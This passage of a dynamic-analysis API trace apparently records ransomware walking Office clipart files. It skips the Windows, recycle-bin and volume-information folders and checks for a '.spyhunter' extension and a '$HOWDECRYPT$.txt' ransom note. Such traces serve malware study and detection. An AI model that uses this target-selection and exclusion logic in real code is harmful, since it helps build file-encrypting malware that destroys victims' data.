pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 67 [0098.103] StrStrIW (lpFirst="J0099182.WMF", lpSrch=".spyhunter") returned 0x0 [0098.103] lstrcmpW (lpString1="J0099182.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.103] lstrcmpW (lpString1="J0099182.WMF", lpString2="_uninstalling_.png") returned 1 [0098.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned 67 [0098.103] GetProcessHeap () returned 0x2c0000 [0098.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38eff0 [0098.103] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2218) returned 0x2c16890 [0098.103] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.104] lstrcmpiW (lpString1="J0099183.WMF", lpString2="Windows") returned -1 [0098.104] lstrlenW (lpString="Windows") returned 7 [0098.104] lstrcmpiW (lpString1="J0099183.WMF", lpString2="$Recycle.bin") returned 1 [0098.104] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.104] lstrcmpiW (lpString1="J0099183.WMF", lpString2="System Volume Information") returned -1 [0098.104] lstrlenW (lpString="System Volume Information") returned 25 [0098.104] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 67 [0098.104] StrStrIW (lpFirst="J0099183.WMF", lpSrch=".spyhunter") returned 0x0 [0098.104] lstrcmpW (lpString1="J0099183.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.104] lstrcmpW (lpString1="J0099183.WMF", lpString2="_uninstalling_.png") returned 1 [0098.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 67 [0098.104] GetProcessHeap () returned 0x2c0000 [0098.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f0c0 [0098.104] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2220) returned 0x2c16890 [0098.104] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.133] lstrcmpiW (lpString1="J0099184.WMF", lpString2="Windows") returned -1 [0098.133] lstrlenW (lpString="Windows") returned 7 [0098.133] lstrcmpiW (lpString1="J0099184.WMF", lpString2="$Recycle.bin") returned 1 [0098.133] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.133] lstrcmpiW (lpString1="J0099184.WMF", lpString2="System Volume Information") returned -1 [0098.133] lstrlenW (lpString="System Volume Information") returned 25 [0098.133] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 67 [0098.133] StrStrIW (lpFirst="J0099184.WMF", lpSrch=".spyhunter") returned 0x0 [0098.133] lstrcmpW (lpString1="J0099184.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.133] lstrcmpW (lpString1="J0099184.WMF", lpString2="_uninstalling_.png") returned 1 [0098.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099184.WMF") returned 67 [0098.133] GetProcessHeap () returned 0x2c0000 [0098.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f0c0 [0098.133] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2208) returned 0x2c16890 [0098.133] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.133] lstrcmpiW (lpString1="J0099185.JPG", lpString2="Windows") returned -1 [0098.133] lstrlenW (lpString="Windows") returned 7 [0098.133] lstrcmpiW (lpString1="J0099185.JPG", lpString2="$Recycle.bin") returned 1 [0098.133] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.134] lstrcmpiW (lpString1="J0099185.JPG", lpString2="System Volume Information") returned -1 [0098.135] lstrlenW (lpString="System Volume Information") returned 25 [0098.135] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 67 [0098.135] StrStrIW (lpFirst="J0099185.JPG", lpSrch=".spyhunter") returned 0x0 [0098.135] lstrcmpW (lpString1="J0099185.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.135] lstrcmpW (lpString1="J0099185.JPG", lpString2="_uninstalling_.png") returned 1 [0098.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 67 [0098.135] GetProcessHeap () returned 0x2c0000 [0098.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f190 [0098.135] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2210) returned 0x2c16890 [0098.135] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.135] lstrcmpiW (lpString1="J0099186.JPG", lpString2="Windows") returned -1 [0098.135] lstrlenW (lpString="Windows") returned 7 [0098.135] lstrcmpiW (lpString1="J0099186.JPG", lpString2="$Recycle.bin") returned 1 [0098.135] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.135] lstrcmpiW (lpString1="J0099186.JPG", lpString2="System Volume Information") returned -1 [0098.136] lstrlenW (lpString="System Volume Information") returned 25 [0098.136] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 67 [0098.136] StrStrIW (lpFirst="J0099186.JPG", lpSrch=".spyhunter") returned 0x0 [0098.136] lstrcmpW (lpString1="J0099186.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.136] lstrcmpW (lpString1="J0099186.JPG", lpString2="_uninstalling_.png") returned 1 [0098.136] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 67 [0098.136] GetProcessHeap () returned 0x2c0000 [0098.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f260 [0098.136] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2218) returned 0x2c16890 [0098.136] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.136] lstrcmpiW (lpString1="J0099187.JPG", lpString2="Windows") returned -1 [0098.136] lstrlenW (lpString="Windows") returned 7 [0098.136] lstrcmpiW (lpString1="J0099187.JPG", lpString2="$Recycle.bin") returned 1 [0098.136] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.136] lstrcmpiW (lpString1="J0099187.JPG", lpString2="System Volume Information") returned -1 [0098.136] lstrlenW (lpString="System Volume Information") returned 25 [0098.136] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 67 [0098.136] StrStrIW (lpFirst="J0099187.JPG", lpSrch=".spyhunter") returned 0x0 [0098.136] lstrcmpW (lpString1="J0099187.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.136] lstrcmpW (lpString1="J0099187.JPG", lpString2="_uninstalling_.png") returned 1 [0098.136] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099187.JPG") returned 67 [0098.137] GetProcessHeap () returned 0x2c0000 [0098.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f330 [0098.137] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2220) returned 0x2c16890 [0098.137] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.137] lstrcmpiW (lpString1="J0099188.JPG", lpString2="Windows") returned -1 [0098.137] lstrlenW (lpString="Windows") returned 7 [0098.137] lstrcmpiW (lpString1="J0099188.JPG", lpString2="$Recycle.bin") returned 1 [0098.137] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.137] lstrcmpiW (lpString1="J0099188.JPG", lpString2="System Volume Information") returned -1 [0098.137] lstrlenW (lpString="System Volume Information") returned 25 [0098.137] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 67 [0098.137] StrStrIW (lpFirst="J0099188.JPG", lpSrch=".spyhunter") returned 0x0 [0098.137] lstrcmpW (lpString1="J0099188.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.137] lstrcmpW (lpString1="J0099188.JPG", lpString2="_uninstalling_.png") returned 1 [0098.137] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 67 [0098.137] GetProcessHeap () returned 0x2c0000 [0098.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f400 [0098.137] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2228) returned 0x2c16890 [0098.138] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.138] lstrcmpiW (lpString1="J0099189.JPG", lpString2="Windows") returned -1 [0098.138] lstrlenW (lpString="Windows") returned 7 [0098.138] lstrcmpiW (lpString1="J0099189.JPG", lpString2="$Recycle.bin") returned 1 [0098.138] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.138] lstrcmpiW (lpString1="J0099189.JPG", lpString2="System Volume Information") returned -1 [0098.138] lstrlenW (lpString="System Volume Information") returned 25 [0098.138] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 67 [0098.138] StrStrIW (lpFirst="J0099189.JPG", lpSrch=".spyhunter") returned 0x0 [0098.138] lstrcmpW (lpString1="J0099189.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.138] lstrcmpW (lpString1="J0099189.JPG", lpString2="_uninstalling_.png") returned 1 [0098.138] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG") returned 67 [0098.138] GetProcessHeap () returned 0x2c0000 [0098.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f4d0 [0098.138] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2230) returned 0x2c16890 [0098.138] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.138] lstrcmpiW (lpString1="J0099190.JPG", lpString2="Windows") returned -1 [0098.138] lstrlenW (lpString="Windows") returned 7 [0098.138] lstrcmpiW (lpString1="J0099190.JPG", lpString2="$Recycle.bin") returned 1 [0098.138] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.138] lstrcmpiW (lpString1="J0099190.JPG", lpString2="System Volume Information") returned -1 [0098.138] lstrlenW (lpString="System Volume Information") returned 25 [0098.139] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 67 [0098.139] StrStrIW (lpFirst="J0099190.JPG", lpSrch=".spyhunter") returned 0x0 [0098.140] lstrcmpW (lpString1="J0099190.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.140] lstrcmpW (lpString1="J0099190.JPG", lpString2="_uninstalling_.png") returned 1 [0098.140] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned 67 [0098.140] GetProcessHeap () returned 0x2c0000 [0098.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f5a0 [0098.140] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2238) returned 0x2c16890 [0098.140] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.140] lstrcmpiW (lpString1="J0099191.JPG", lpString2="Windows") returned -1 [0098.140] lstrlenW (lpString="Windows") returned 7 [0098.140] lstrcmpiW (lpString1="J0099191.JPG", lpString2="$Recycle.bin") returned 1 [0098.140] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.140] lstrcmpiW (lpString1="J0099191.JPG", lpString2="System Volume Information") returned -1 [0098.140] lstrlenW (lpString="System Volume Information") returned 25 [0098.140] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 67 [0098.140] StrStrIW (lpFirst="J0099191.JPG", lpSrch=".spyhunter") returned 0x0 [0098.140] lstrcmpW (lpString1="J0099191.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.141] lstrcmpW (lpString1="J0099191.JPG", lpString2="_uninstalling_.png") returned 1 [0098.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned 67 [0098.141] GetProcessHeap () returned 0x2c0000 [0098.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f670 [0098.141] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2240) returned 0x2c16890 [0098.141] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.141] lstrcmpiW (lpString1="J0099192.GIF", lpString2="Windows") returned -1 [0098.141] lstrlenW (lpString="Windows") returned 7 [0098.141] lstrcmpiW (lpString1="J0099192.GIF", lpString2="$Recycle.bin") returned 1 [0098.141] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.141] lstrcmpiW (lpString1="J0099192.GIF", lpString2="System Volume Information") returned -1 [0098.141] lstrlenW (lpString="System Volume Information") returned 25 [0098.141] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 67 [0098.141] StrStrIW (lpFirst="J0099192.GIF", lpSrch=".spyhunter") returned 0x0 [0098.141] lstrcmpW (lpString1="J0099192.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.141] lstrcmpW (lpString1="J0099192.GIF", lpString2="_uninstalling_.png") returned 1 [0098.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 67 [0098.141] GetProcessHeap () returned 0x2c0000 [0098.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f740 [0098.141] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2248) returned 0x2c16890 [0098.141] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.142] lstrcmpiW (lpString1="J0099193.GIF", lpString2="Windows") returned -1 [0098.142] lstrlenW (lpString="Windows") returned 7 [0098.142] lstrcmpiW (lpString1="J0099193.GIF", lpString2="$Recycle.bin") returned 1 [0098.142] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.142] lstrcmpiW (lpString1="J0099193.GIF", lpString2="System Volume Information") returned -1 [0098.142] lstrlenW (lpString="System Volume Information") returned 25 [0098.142] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 67 [0098.142] StrStrIW (lpFirst="J0099193.GIF", lpSrch=".spyhunter") returned 0x0 [0098.142] lstrcmpW (lpString1="J0099193.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.142] lstrcmpW (lpString1="J0099193.GIF", lpString2="_uninstalling_.png") returned 1 [0098.142] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099193.GIF") returned 67 [0098.142] GetProcessHeap () returned 0x2c0000 [0098.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f810 [0098.142] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2250) returned 0x2c16890 [0098.142] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.142] lstrcmpiW (lpString1="J0099194.GIF", lpString2="Windows") returned -1 [0098.142] lstrlenW (lpString="Windows") returned 7 [0098.142] lstrcmpiW (lpString1="J0099194.GIF", lpString2="$Recycle.bin") returned 1 [0098.142] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.142] lstrcmpiW (lpString1="J0099194.GIF", lpString2="System Volume Information") returned -1 [0098.142] lstrlenW (lpString="System Volume Information") returned 25 [0098.142] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 67 [0098.142] StrStrIW (lpFirst="J0099194.GIF", lpSrch=".spyhunter") returned 0x0 [0098.143] lstrcmpW (lpString1="J0099194.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.143] lstrcmpW (lpString1="J0099194.GIF", lpString2="_uninstalling_.png") returned 1 [0098.143] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 67 [0098.143] GetProcessHeap () returned 0x2c0000 [0098.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f8e0 [0098.143] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2258) returned 0x2c16890 [0098.143] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.143] lstrcmpiW (lpString1="J0099195.GIF", lpString2="Windows") returned -1 [0098.143] lstrlenW (lpString="Windows") returned 7 [0098.143] lstrcmpiW (lpString1="J0099195.GIF", lpString2="$Recycle.bin") returned 1 [0098.143] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.143] lstrcmpiW (lpString1="J0099195.GIF", lpString2="System Volume Information") returned -1 [0098.143] lstrlenW (lpString="System Volume Information") returned 25 [0098.143] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 67 [0098.143] StrStrIW (lpFirst="J0099195.GIF", lpSrch=".spyhunter") returned 0x0 [0098.143] lstrcmpW (lpString1="J0099195.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.143] lstrcmpW (lpString1="J0099195.GIF", lpString2="_uninstalling_.png") returned 1 [0098.143] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 67 [0098.143] GetProcessHeap () returned 0x2c0000 [0098.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38f9b0 [0098.143] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2260) returned 0x2c16890 [0098.144] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.144] lstrcmpiW (lpString1="J0099196.GIF", lpString2="Windows") returned -1 [0098.144] lstrlenW (lpString="Windows") returned 7 [0098.144] lstrcmpiW (lpString1="J0099196.GIF", lpString2="$Recycle.bin") returned 1 [0098.144] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.144] lstrcmpiW (lpString1="J0099196.GIF", lpString2="System Volume Information") returned -1 [0098.144] lstrlenW (lpString="System Volume Information") returned 25 [0098.144] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 67 [0098.144] StrStrIW (lpFirst="J0099196.GIF", lpSrch=".spyhunter") returned 0x0 [0098.144] lstrcmpW (lpString1="J0099196.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.144] lstrcmpW (lpString1="J0099196.GIF", lpString2="_uninstalling_.png") returned 1 [0098.144] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 67 [0098.144] GetProcessHeap () returned 0x2c0000 [0098.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38fa80 [0098.144] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2268) returned 0x2c16890 [0098.144] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.144] lstrcmpiW (lpString1="J0099197.GIF", lpString2="Windows") returned -1 [0098.144] lstrlenW (lpString="Windows") returned 7 [0098.144] lstrcmpiW (lpString1="J0099197.GIF", lpString2="$Recycle.bin") returned 1 [0098.144] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.144] lstrcmpiW (lpString1="J0099197.GIF", lpString2="System Volume Information") returned -1 [0098.144] lstrlenW (lpString="System Volume Information") returned 25 [0098.145] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 67 [0098.145] StrStrIW (lpFirst="J0099197.GIF", lpSrch=".spyhunter") returned 0x0 [0098.145] lstrcmpW (lpString1="J0099197.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.145] lstrcmpW (lpString1="J0099197.GIF", lpString2="_uninstalling_.png") returned 1 [0098.145] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 67 [0098.145] GetProcessHeap () returned 0x2c0000 [0098.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38fb50 [0098.145] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2270) returned 0x2c16890 [0098.145] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.145] lstrcmpiW (lpString1="J0099198.GIF", lpString2="Windows") returned -1 [0098.145] lstrlenW (lpString="Windows") returned 7 [0098.145] lstrcmpiW (lpString1="J0099198.GIF", lpString2="$Recycle.bin") returned 1 [0098.145] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.145] lstrcmpiW (lpString1="J0099198.GIF", lpString2="System Volume Information") returned -1 [0098.145] lstrlenW (lpString="System Volume Information") returned 25 [0098.145] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 67 [0098.145] StrStrIW (lpFirst="J0099198.GIF", lpSrch=".spyhunter") returned 0x0 [0098.145] lstrcmpW (lpString1="J0099198.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.145] lstrcmpW (lpString1="J0099198.GIF", lpString2="_uninstalling_.png") returned 1 [0098.145] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 67 [0098.145] GetProcessHeap () returned 0x2c0000 [0098.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38fc20 [0098.146] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2278) returned 0x2c16890 [0098.146] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.146] lstrcmpiW (lpString1="J0099199.GIF", lpString2="Windows") returned -1 [0098.146] lstrlenW (lpString="Windows") returned 7 [0098.146] lstrcmpiW (lpString1="J0099199.GIF", lpString2="$Recycle.bin") returned 1 [0098.146] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.146] lstrcmpiW (lpString1="J0099199.GIF", lpString2="System Volume Information") returned -1 [0098.146] lstrlenW (lpString="System Volume Information") returned 25 [0098.146] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 67 [0098.146] StrStrIW (lpFirst="J0099199.GIF", lpSrch=".spyhunter") returned 0x0 [0098.146] lstrcmpW (lpString1="J0099199.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.146] lstrcmpW (lpString1="J0099199.GIF", lpString2="_uninstalling_.png") returned 1 [0098.146] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 67 [0098.146] GetProcessHeap () returned 0x2c0000 [0098.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38fcf0 [0098.146] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2280) returned 0x2c16890 [0098.146] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.146] lstrcmpiW (lpString1="J0099200.GIF", lpString2="Windows") returned -1 [0098.146] lstrlenW (lpString="Windows") returned 7 [0098.146] lstrcmpiW (lpString1="J0099200.GIF", lpString2="$Recycle.bin") returned 1 [0098.146] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.146] lstrcmpiW (lpString1="J0099200.GIF", lpString2="System Volume Information") returned -1 [0098.147] lstrlenW (lpString="System Volume Information") returned 25 [0098.147] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 67 [0098.147] StrStrIW (lpFirst="J0099200.GIF", lpSrch=".spyhunter") returned 0x0 [0098.147] lstrcmpW (lpString1="J0099200.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.147] lstrcmpW (lpString1="J0099200.GIF", lpString2="_uninstalling_.png") returned 1 [0098.147] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 67 [0098.147] GetProcessHeap () returned 0x2c0000 [0098.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38fdc0 [0098.147] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2288) returned 0x2c16890 [0098.147] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.147] lstrcmpiW (lpString1="J0099201.GIF", lpString2="Windows") returned -1 [0098.147] lstrlenW (lpString="Windows") returned 7 [0098.147] lstrcmpiW (lpString1="J0099201.GIF", lpString2="$Recycle.bin") returned 1 [0098.147] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.147] lstrcmpiW (lpString1="J0099201.GIF", lpString2="System Volume Information") returned -1 [0098.147] lstrlenW (lpString="System Volume Information") returned 25 [0098.147] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 67 [0098.147] StrStrIW (lpFirst="J0099201.GIF", lpSrch=".spyhunter") returned 0x0 [0098.147] lstrcmpW (lpString1="J0099201.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.147] lstrcmpW (lpString1="J0099201.GIF", lpString2="_uninstalling_.png") returned 1 [0098.147] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 67 [0098.148] GetProcessHeap () returned 0x2c0000 [0098.148] RtlAllocateHeap 